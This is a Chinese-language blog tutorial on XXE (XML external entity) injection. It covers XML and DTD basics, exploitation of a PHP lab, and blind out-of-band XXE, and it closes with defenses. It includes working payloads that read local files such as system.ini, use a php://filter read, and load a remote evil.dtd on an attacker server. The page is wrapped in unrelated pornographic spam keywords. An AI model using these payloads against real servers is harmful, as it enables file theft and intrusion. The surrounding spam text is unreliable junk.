<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      8-XXE滲透與防御

      1、XXE漏洞(上)

      1.1 XML基礎知識

      可拓展標記語言,html里的標簽是固定的,xml可以自定義標簽

      用途:
      1、配置文件
      2、交換配置(通信)

      1.2 XML內容

      第一行XML聲明,對應的版本和編碼
      XML根元素+XML子元素

      格式要求:

      • XML文檔必須有根元素
      • XML文檔必須有關閉標簽
      • XML標簽對大小寫敏感
      • XML元素必須被正確的嵌套
      • XML屬性必須加引號

      1.3 DTD文檔類型定義:可以根據XML自己定義格式規范

      1.3.1 DTD內容之元素


      1.3.2 DTD內容之實體:定義被引用的文件或字符(相當于全局變量)


      1.3.3 外部實體ENTITY


      file:///etc//passwd
      php://filter/read=convert.base64-encode/resource=index.phh
      http://wwuya.com/evil.dtd

      1.4 完整的XML內容

      2、XXE漏洞(中)

      2.1 XXE定義

      XML外部實體注入(XXE或XEE)
      如果Web應用的腳本代碼沒有限制XML引入外部實體,從而導致用戶可以插入一個外部實體,并且其中的內容會被服務器端執行,插入的代碼可能導致任意文件讀取、系統命令執行、內網端口探測、攻擊內網網站等危害

      原因:使用XML傳輸數據,并且允許解析外部實體

      2.2 XXE靶場(PHP)

      2.2.1 第一步:確定它使用的是XXE格式傳輸數據,F12查看login后的Network


      2.2.2 第二步:修改傳輸數據的內容,添加外部實體

      BP抓包

      添加外部實體,并引用
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE a[
      <!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini">]>
      <name>&xxe;</name>

      在內容中加上&xxe;

      2.3 盲打(如果沒有回顯情況)

      使用DNSLog.cn網站,查看有沒有網站訪問,以此來驗證攻擊是否成功
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE root [
      <!ENTITY % remote SYSTEM "http://xxx">%remote;]>

      后者傳輸到自己的服務器.dtd

      3、XXE漏洞(下)

      3.1 XXE防御

      1、在解析XML之前,加入禁用實體解析的代碼
      2、過濾用戶提交的XML數據
      3、WAF,如ModSecurity

      posted @ 2024-12-05 17:16  xmh666  閱讀(45)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产精品自拍午夜福利| 好吊视频一区二区三区在线| 无码一区中文字幕| 99久久久无码国产精品免费 | 久久香蕉欧美精品| 四虎永久免费精品视频| 吉木乃县| 偏关县| 成人午夜视频在线| 国产中文字幕日韩精品| 东方四虎在线观看av| 日本一级午夜福利免费区| 在线日韩一区二区| 国产91丝袜在线播放动漫| 免费人成在线观看网站| 囯产精品久久久久久久久久妞妞| 最新亚洲精品国偷自产在线| 少妇高潮水多太爽了动态图 | 亚洲自偷自拍另类小说| 双腿张开被5个男人调教电影| 中文有无人妻vs无码人妻激烈| 亚日韩精品一区二区三区| 美女黄18以下禁止观看| 欧美猛少妇色xxxxx猛叫| 久久亚洲国产精品久久| 人妻精品久久无码区| 国产欧美精品一区二区三区-老狼| 成人国产精品中文字幕| 国产午夜亚洲精品国产成人| 国产乱国产乱老熟300部视频| 国内精品免费久久久久电影院97| 日韩人妻少妇一区二区三区| 亚洲一区av无码少妇电影| 色二av手机版在线| 国内精品无码一区二区三区| 最新国内精品自在自线视频| 国产一区二区三区不卡视频| 成人国产乱对白在线观看| 兰西县| 久久国产乱子精品免费女| 亚洲一区二区美女av|